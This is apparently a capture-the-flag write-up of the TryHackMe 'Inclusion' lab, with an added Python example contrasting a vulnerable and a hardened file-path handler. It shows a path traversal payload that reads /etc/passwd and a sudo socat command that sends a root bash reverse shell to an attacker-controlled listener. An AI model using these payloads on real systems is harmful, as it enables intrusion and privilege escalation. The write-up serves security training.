TryHackMe Inclusion
@ Animesh Roy | Thursday, Jul 8, 2021 | 2 minutes read | Update at Thursday, Jul 8, 2021


Task 01: Deploy

This is a beginner-level room designed for people who want to get familiar with the Local File Inclusion (LFI) vulnerability.


Task 02: Root It

Recon

Nmap

nmap found two open TCP ports, SSH (22) and HTTP (80):

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-08 14:35 IST
Nmap scan report for 10.10.206.247
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.52 seconds

This is an LFI lab, so let's open the posts and see what we can do.

We get an input parameter whose value we can modify. Let's try reading the /etc/passwd file, which is world-readable on Linux:

http://<machine-ip>/article?name=../../../../../../etc/passwd

Turns out we can read the local /etc/passwd file.
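The article?name= parameter above is joined straight onto a file path, which is what lets "../" segments walk out of the articles directory. The following is an added example (not code from the room or from this post) showing that vulnerable join in Python beside a hardened path check; the directory names articles/, hacking and secret are constructed for the demo.

```python
import os
import tempfile


def naive_path(base_dir, name):
    """Vulnerable handler logic: the request parameter is joined straight
    onto the articles directory, so '..' segments walk out of it (and an
    absolute name such as '/etc/passwd' replaces base_dir entirely)."""
    return os.path.join(base_dir, name)


def safe_article_path(base_dir, name):
    """Hardened version: resolve symlinks and '..' first, then confirm the
    result is still inside base_dir. Returns None for anything outside."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def read_article(base_dir, name):
    """What a ?name= handler should do: only serve regular files that
    resolve inside the articles directory."""
    path = safe_article_path(base_dir, name)
    if path is None or not os.path.isfile(path):
        return None
    with open(path) as fh:
        return fh.read()


def demo():
    """Constructed layout: one article inside the allowed directory and a
    'secret' file outside it standing in for /etc/passwd. Returns what the
    vulnerable and hardened handlers each give back for the same inputs."""
    with tempfile.TemporaryDirectory() as root:
        articles = os.path.join(root, "articles")
        os.mkdir(articles)
        with open(os.path.join(articles, "hacking"), "w") as fh:
            fh.write("article body\n")
        with open(os.path.join(root, "secret"), "w") as fh:
            fh.write("root:x:0:0\n")
        traversal = "../secret"
        with open(naive_path(articles, traversal)) as fh:
            leaked = fh.read()  # vulnerable: the file outside articles/ is served
        blocked = read_article(articles, traversal)  # hardened: returns None
        allowed = read_article(articles, "hacking")  # hardened: normal article still works
        return leaked, blocked, allowed
```

Running demo() shows the naive join handing back the out-of-tree file while the hardened handler refuses it and still serves the legitimate article.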

The file also contains a set of credentials in a comment.

Let's try SSH with the credentials we found.

┌──(anir0y㉿kali)-[~/share/thm/room/inclusion]
└─$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)

The credentials worked! The user flag is in the home directory, in user.txt.



Root

We now have SSH access to the server; let's look for a way to become root.

I'm going to start with the sudo -l command to see if falconfeast has any sudo privileges.

# user can run socat with no password required. 
falconfeast@inclusion:~$ sudo -l 
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat

Nice easy privesc here — we’ve got sudo access for socat, which is essentially a more powerful (if more complex) version of Netcat. In other words, we can use socat to send ourselves a root shell. First, on your own attacking computer, run this command:

socat file:`tty`,raw,echo=0 tcp-listen:9001

This will set up a socat listener on your own machine, on port 9001.

On the remote machine, use this command (the port must match the one the listener is waiting on):

sudo socat tcp-connect:<your-ip-address>:9001 exec:bash,pty,stderr,setsid,sigint,sane

We got the root flag!


You can learn more about socat in this amazing room: SHELL


Bonus

You could have got both flags with the web LFI itself. I don't know whether that is the intended way or not, but hey, you have that option too.

  • User flag via web LFI (screenshot: user-via-web)
  • Root flag via web LFI (screenshot: root-via-web)
